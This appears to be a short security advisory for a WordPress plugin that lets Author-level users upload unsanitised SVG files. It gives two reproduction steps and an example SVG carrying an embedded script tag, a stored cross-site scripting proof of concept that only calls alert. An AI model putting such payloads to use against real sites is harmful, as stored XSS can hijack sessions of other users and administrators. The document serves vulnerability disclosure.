Description The plugin does not sanitise uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads.
1. As an admin, enable SVG uploads at https://example.com/wp-admin/options-general.php?page=mime-types-extended
2. As an author, upload a malicious SVG via the Media Library. Example SVG:
```
<svg xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">alert("xss");</script>
</svg>
```